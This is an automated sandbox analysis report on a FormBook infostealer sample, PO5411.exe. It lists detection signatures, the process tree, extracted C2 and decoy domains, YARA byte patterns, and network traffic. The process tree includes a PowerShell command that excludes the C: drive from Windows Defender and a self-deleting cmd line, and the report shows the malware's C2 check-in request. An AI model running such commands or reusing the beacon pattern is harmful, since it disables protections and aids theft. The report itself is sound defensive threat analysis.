Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report PO5411.exe

Overview

General Information

Sample Name:PO5411.exe
Analysis ID:385218
MD5:3cd76d38ad07c345862b07d90186851e
SHA1:e3fc0973898eee9723b7b92828ffbbafaa0b5456
SHA256:588692919a751e9852cf32e0b1da42c347f2ff99a2afd2378c6a7573d7a532fc
Tags:exe
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Writes to foreign memory regions
Yara detected Costura Assembly Loader
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to launch a process as a different user
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • PO5411.exe (PID: 6788 cmdline: 'C:\Users\user\Desktop\PO5411.exe' MD5: 3CD76D38AD07C345862B07D90186851E)
    • powershell.exe (PID: 1368 cmdline: 'powershell' Add-MpPreference -ExclusionPath C:\ MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 4500 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • PO5411.exe (PID: 6140 cmdline: C:\Users\user\AppData\Local\Temp\PO5411.exe MD5: 3CD76D38AD07C345862B07D90186851E)
      • explorer.exe (PID: 3424 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • cmd.exe (PID: 5960 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • cmd.exe (PID: 6664 cmdline: /c del 'C:\Users\user\AppData\Local\Temp\PO5411.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6644 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.013y.com/pnqr/"], "decoy": ["bullexch9.com", "hiiidesigns.com", "yosapark-gakuenmae.com", "movementinspires.com", "orlandas.com", "flowga.world", "opende.info", "jiconic.com", "selviclothingco.com", "herbalmedicineresearch.com", "contex33.xyz", "riord.com", "alchemistslibrary.com", "ecalyte.com", "tutu119.com", "61ue00.com", "properwayllc.com", "tamitoe.com", "adacompliantsoftware.com", "deliabe.com", "edrcounselling.group", "indigoconsultinguganda.com", "stjom.church", "vegansonfire.com", "bostonimaginggroup.com", "greenchilicountryjamboree.com", "culvercoop.com", "northlakerental.com", "lpp888.xyz", "hostinganl.com", "spin889988.club", "thedoctornearme.com", "luolan99.com", "gamers-casino.space", "dailyovertips.com", "torer.net", "fuhrerscheindienst.com", "diysergeant.com", "neuralnuture.net", "hysplashes.xyz", "tretkurbel.site", "ccelaya.com", "electricalpanelmonterey.com", "hullabaloocookies.com", "sunnyshousebrooklyn.com", "mini-jeep-willys.online", "angelaharriotthomes.com", "vpathletics.online", "moeginokai.com", "jesusistderweg.info", "printsublimbandung.com", "empirehomeservicesllc.com", "fiestaselenas.com", "elyonkioficial.com", "instaseries94.com", "digivalplan.com", "highaltitudeballooning.com", "choosefour.com", "fitpawsmobile.com", "radiancebyreilly.com", "finlst.com", "volmaqhsogroup.com", "malayziascandles.com", "lazerworkshop.com"]}

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
PO5411.exeJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\Users\user\AppData\Local\Temp\PO5411.exeJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000011.00000002.848830027.00000000007B2000.00000002.00020000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
        00000001.00000000.647947082.0000000000492000.00000002.00020000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
          00000011.00000002.849226425.0000000000CB0000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
            00000011.00000002.849226425.0000000000CB0000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
            • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
            • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
            • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
            • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
            • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
            • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
            • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
            • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
            • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
            • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
            • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
            00000011.00000002.849226425.0000000000CB0000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
            • 0x166a9:$sqlite3step: 68 34 1C 7B E1
            • 0x167bc:$sqlite3step: 68 34 1C 7B E1
            • 0x166d8:$sqlite3text: 68 38 2A 90 C5
            • 0x167fd:$sqlite3text: 68 38 2A 90 C5
            • 0x166eb:$sqlite3blob: 68 53 D8 7F 8C
            • 0x16813:$sqlite3blob: 68 53 D8 7F 8C
            Click to see the 35 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            21.2.cmd.exe.105d728.0.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
              1.0.PO5411.exe.490000.0.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                21.2.cmd.exe.105d728.0.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                  17.0.PO5411.exe.7b0000.0.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                    17.2.PO5411.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
                      Click to see the 12 entries

                      Sigma Overview

                      No Sigma rule has matched

                      Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Antivirus detection for URL or domainShow sources
                      Source: www.013y.com/pnqr/Avira URL Cloud: Label: malware
                      Found malware configurationShow sources
                      Source: 00000011.00000002.849226425.0000000000CB0000.00000040.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.013y.com/pnqr/"], "decoy": ["bullexch9.com", "hiiidesigns.com", "yosapark-gakuenmae.com", "movementinspires.com", "orlandas.com", "flowga.world", "opende.info", "jiconic.com", "selviclothingco.com", "herbalmedicineresearch.com", "contex33.xyz", "riord.com", "alchemistslibrary.com", "ecalyte.com", "tutu119.com", "61ue00.com", "properwayllc.com", "tamitoe.com", "adacompliantsoftware.com", "deliabe.com", "edrcounselling.group", "indigoconsultinguganda.com", "stjom.church", "vegansonfire.com", "bostonimaginggroup.com", "greenchilicountryjamboree.com", "culvercoop.com", "northlakerental.com", "lpp888.xyz", "hostinganl.com", "spin889988.club", "thedoctornearme.com", "luolan99.com", "gamers-casino.space", "dailyovertips.com", "torer.net", "fuhrerscheindienst.com", "diysergeant.com", "neuralnuture.net", "hysplashes.xyz", "tretkurbel.site", "ccelaya.com", "electricalpanelmonterey.com", "hullabaloocookies.com", "sunnyshousebrooklyn.com", "mini-jeep-willys.online", "angelaharriotthomes.com", "vpathletics.online", "moeginokai.com", "jesusistderweg.info", "printsublimbandung.com", "empirehomeservicesllc.com", "fiestaselenas.com", "elyonkioficial.com", "instaseries94.com", "digivalplan.com", "highaltitudeballooning.com", "choosefour.com", "fitpawsmobile.com", "radiancebyreilly.com", "finlst.com", "volmaqhsogroup.com", "malayziascandles.com", "lazerworkshop.com"]}
                      Multi AV Scanner detection for dropped fileShow sources
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeReversingLabs: Detection: 20%
                      Multi AV Scanner detection for submitted fileShow sources
                      Source: PO5411.exeReversingLabs: Detection: 20%
                      Yara detected FormBookShow sources
                      Source: Yara matchFile source: 00000011.00000002.849226425.0000000000CB0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.788482651.00000000028F6000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000015.00000002.912382912.0000000000E40000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.848751535.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.789244532.00000000038F1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.789816893.00000000039F3000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.849831780.00000000010B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000003.776623532.0000000003A8E000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000015.00000002.912991547.0000000001150000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000015.00000002.912181333.0000000000D50000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 17.2.PO5411.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.PO5411.exe.38f1990.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.PO5411.exe.400000.0.unpack, type: UNPACKEDPE
                      Machine Learning detection for dropped fileShow sources
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeJoe Sandbox ML: detected
                      Machine Learning detection for sampleShow sources
                      Source: PO5411.exeJoe Sandbox ML: detected
                      Source: 17.2.PO5411.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_0122D50F DuplicateEncryptionInfoFileExt,17_2_0122D50F
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_0122D5E0 DuplicateEncryptionInfoFileExt,17_2_0122D5E0
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_01297C23 DuplicateEncryptionInfoFileExt,17_2_01297C23
                      Source: PO5411.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                      Source: PO5411.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                      Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000012.00000000.815065469.0000000005A00000.00000002.00000001.sdmp
                      Source: Binary string: wntdll.pdbUGP source: PO5411.exe, 00000011.00000002.850207954.00000000011F0000.00000040.00000001.sdmp, cmd.exe, 00000015.00000003.848880099.0000000003230000.00000004.00000001.sdmp
                      Source: Binary string: cmd.pdbUGP source: PO5411.exe, 00000011.00000002.850001084.0000000001130000.00000040.00000001.sdmp, cmd.exe, 00000015.00000002.913116330.00000000011D0000.00000040.00000001.sdmp
                      Source: Binary string: wntdll.pdb source: PO5411.exe, cmd.exe, 00000015.00000003.848880099.0000000003230000.00000004.00000001.sdmp
                      Source: Binary string: cmd.pdb source: PO5411.exe, 00000011.00000002.850001084.0000000001130000.00000040.00000001.sdmp, cmd.exe
                      Source: Binary string: C:\Development\Releases\Json\Working\Newtonsoft.Json\Working-Signed\Src\Newtonsoft.Json\obj\Release\Net40\Newtonsoft.Json.pdb source: PO5411.exe, 00000001.00000002.787808714.0000000002843000.00000004.00000001.sdmp
                      Source: Binary string: wscui.pdb source: explorer.exe, 00000012.00000000.815065469.0000000005A00000.00000002.00000001.sdmp
                      Source: C:\Windows\SysWOW64\cmd.exeCode function: 21_2_011F31DC FindFirstFileW,FindNextFileW,FindClose,21_2_011F31DC
                      Source: C:\Windows\SysWOW64\cmd.exeCode function: 21_2_011D85EA memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,21_2_011D85EA
                      Source: C:\Windows\SysWOW64\cmd.exeCode function: 21_2_011E245C FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove,21_2_011E245C
                      Source: C:\Windows\SysWOW64\cmd.exeCode function: 21_2_011DB89C GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose,21_2_011DB89C
                      Source: C:\Windows\SysWOW64\cmd.exeCode function: 21_2_011E68BA FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose,21_2_011E68BA
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 4x nop then pop ebx17_2_00406A94
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 4x nop then pop edi17_2_004162A8

                      Networking:

                      barindex
                      Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                      Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49767 -> 107.180.0.224:80
                      Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49767 -> 107.180.0.224:80
                      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49767 -> 107.180.0.224:80
                      C2 URLs / IPs found in malware configurationShow sources
                      Source: Malware configuration extractorURLs: www.013y.com/pnqr/
                      Source: global trafficHTTP traffic detected: GET /pnqr/?rZULMf_=947cDAfMtsIS/zejVd4hkXb2b5N+AxK6ZTWGMEGb/CYmLctFgtEwYesMNqUKu8NWWTag&FtgT=MXyTezehH HTTP/1.1Host: www.movementinspires.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
                      Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                      Source: C:\Windows\explorer.exeCode function: 18_2_04DD3302 getaddrinfo,setsockopt,recv,18_2_04DD3302
                      Source: global trafficHTTP traffic detected: GET /pnqr/?rZULMf_=947cDAfMtsIS/zejVd4hkXb2b5N+AxK6ZTWGMEGb/CYmLctFgtEwYesMNqUKu8NWWTag&FtgT=MXyTezehH HTTP/1.1Host: www.movementinspires.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
                      Source: unknownDNS traffic detected: queries for: clientconfig.passport.net
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 12 Apr 2021 06:31:17 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeSet-Cookie: __cfduid=d959913b96847f506eacf9e36643cadec1618209077; expires=Wed, 12-May-21 06:31:17 GMT; path=/; domain=.movementinspires.com; HttpOnly; SameSite=LaxX-Frame-Options: denyCF-Cache-Status: DYNAMICcf-request-id: 096660116e00004ec89d111000000001Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=%2BWZXmVIHl%2BsUq6hhobMFjnqZJc2mMnUT2HOG%2F9b63aN70uNDb%2FC6FQSR7prKw86mj9YVVsDosUOXWBGQXck%2FEmD95DpCPKczlCBvgo7AySNSiFUQN5yifsc%3D"}],"max_age":604800,"group":"cf-nel"}NEL: {"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 63ea692f18cb4ec8-FRAalt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 35 35 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 2c 20 23 70 61 72 74 6e 65 72 2c 20 69 66 72 61 6d 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 75 74 6c 69 6e 65 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 62 61 73 65 6c 69 6e 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e Data Ascii: 554<!DOCTYPE html><html> <head> <meta charset="utf-8"> <style type="text/css"> html, body, #partner, iframe { height:100%; width:100%; margin:0; padding:0; border:0; outline:0; font-size:100%; vertical-align:baseline; background:transparent; } body { overflow:hidden; } </style>
                      Source: PO5411.exe, 00000001.00000002.795829279.0000000005820000.00000002.00000001.sdmp, explorer.exe, 00000012.00000000.828993934.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
                      Source: PO5411.exe, 00000001.00000002.787808714.0000000002843000.00000004.00000001.sdmpString found in binary or memory: http://james.new
                      Source: PO5411.exe, 00000001.00000002.787808714.0000000002843000.00000004.00000001.sdmpString found in binary or memory: http://james.newtonking.com/projects/json
                      Source: PO5411.exe, 00000001.00000002.787808714.0000000002843000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: explorer.exe, 00000012.00000002.914771509.0000000002B50000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
                      Source: PO5411.exe, 00000001.00000002.795829279.0000000005820000.00000002.00000001.sdmp, explorer.exe, 00000012.00000000.828993934.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                      Source: PO5411.exe, 00000001.00000002.795829279.0000000005820000.00000002.00000001.sdmp, explorer.exe, 00000012.00000000.828993934.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
                      Source: PO5411.exe, 00000001.00000002.795829279.0000000005820000.00000002.00000001.sdmp, explorer.exe, 00000012.00000000.828993934.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
                      Source: explorer.exe, 00000012.00000000.828993934.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                      Source: PO5411.exe, 00000001.00000002.795829279.0000000005820000.00000002.00000001.sdmp, explorer.exe, 00000012.00000000.828993934.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                      Source: PO5411.exe, 00000001.00000002.795829279.0000000005820000.00000002.00000001.sdmp, explorer.exe, 00000012.00000000.828993934.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                      Source: PO5411.exe, 00000001.00000002.795829279.0000000005820000.00000002.00000001.sdmp, explorer.exe, 00000012.00000000.828993934.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                      Source: PO5411.exe, 00000001.00000002.795829279.0000000005820000.00000002.00000001.sdmp, explorer.exe, 00000012.00000000.828993934.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                      Source: PO5411.exe, 00000001.00000002.795829279.0000000005820000.00000002.00000001.sdmp, explorer.exe, 00000012.00000000.828993934.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                      Source: PO5411.exe, 00000001.00000002.795829279.0000000005820000.00000002.00000001.sdmp, explorer.exe, 00000012.00000000.828993934.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                      Source: PO5411.exe, 00000001.00000002.795829279.0000000005820000.00000002.00000001.sdmp, explorer.exe, 00000012.00000000.828993934.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
                      Source: PO5411.exe, 00000001.00000002.795829279.0000000005820000.00000002.00000001.sdmp, explorer.exe, 00000012.00000000.828993934.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                      Source: PO5411.exe, 00000001.00000002.795829279.0000000005820000.00000002.00000001.sdmp, explorer.exe, 00000012.00000000.828993934.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                      Source: PO5411.exe, 00000001.00000002.795829279.0000000005820000.00000002.00000001.sdmp, explorer.exe, 00000012.00000000.828993934.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                      Source: PO5411.exe, 00000001.00000002.795829279.0000000005820000.00000002.00000001.sdmp, explorer.exe, 00000012.00000000.828993934.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                      Source: PO5411.exe, 00000001.00000002.795829279.0000000005820000.00000002.00000001.sdmp, explorer.exe, 00000012.00000000.828993934.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                      Source: PO5411.exe, 00000001.00000002.795829279.0000000005820000.00000002.00000001.sdmp, explorer.exe, 00000012.00000000.828993934.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
                      Source: PO5411.exe, 00000001.00000002.795829279.0000000005820000.00000002.00000001.sdmp, explorer.exe, 00000012.00000000.828993934.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                      Source: PO5411.exe, 00000001.00000002.787808714.0000000002843000.00000004.00000001.sdmpString found in binary or memory: http://www.newtonsoft.com/jsonschema
                      Source: PO5411.exe, 00000001.00000002.795829279.0000000005820000.00000002.00000001.sdmp, explorer.exe, 00000012.00000000.828993934.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
                      Source: PO5411.exe, 00000001.00000002.795829279.0000000005820000.00000002.00000001.sdmp, explorer.exe, 00000012.00000000.828993934.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
                      Source: PO5411.exe, 00000001.00000002.795829279.0000000005820000.00000002.00000001.sdmp, explorer.exe, 00000012.00000000.828993934.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
                      Source: explorer.exe, 00000012.00000000.828993934.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
                      Source: PO5411.exe, 00000001.00000002.795829279.0000000005820000.00000002.00000001.sdmp, explorer.exe, 00000012.00000000.828993934.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
                      Source: PO5411.exe, 00000001.00000002.795829279.0000000005820000.00000002.00000001.sdmp, explorer.exe, 00000012.00000000.828993934.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                      Source: PO5411.exe, 00000001.00000002.795829279.0000000005820000.00000002.00000001.sdmp, explorer.exe, 00000012.00000000.828993934.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                      Source: powershell.exe, 0000000E.00000003.878734828.000000000903F000.00000004.00000001.sdmpString found in binary or memory: https://wdcp.micros
                      Source: powershell.exe, 0000000E.00000003.880071680.0000000009043000.00000004.00000001.sdmpString found in binary or memory: https://wdcp.micros?
                      Source: C:\Windows\explorer.exeCode function: 18_2_04DCCEB2 OpenClipboard,18_2_04DCCEB2

                      E-Banking Fraud:

                      barindex
                      Yara detected FormBookShow sources
                      Source: Yara matchFile source: 00000011.00000002.849226425.0000000000CB0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.788482651.00000000028F6000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000015.00000002.912382912.0000000000E40000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.848751535.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.789244532.00000000038F1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.789816893.00000000039F3000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.849831780.00000000010B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000003.776623532.0000000003A8E000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000015.00000002.912991547.0000000001150000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000015.00000002.912181333.0000000000D50000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 17.2.PO5411.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.PO5411.exe.38f1990.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.PO5411.exe.400000.0.unpack, type: UNPACKEDPE

                      System Summary:

                      barindex
                      Malicious sample detected (through community Yara rule)Show sources
                      Source: 00000011.00000002.849226425.0000000000CB0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
                      Source: 00000011.00000002.849226425.0000000000CB0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
                      Source: 00000001.00000002.788482651.00000000028F6000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
                      Source: 00000001.00000002.788482651.00000000028F6000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
                      Source: 00000015.00000002.912382912.0000000000E40000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
                      Source: 00000015.00000002.912382912.0000000000E40000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
                      Source: 00000011.00000002.848751535.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
                      Source: 00000011.00000002.848751535.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
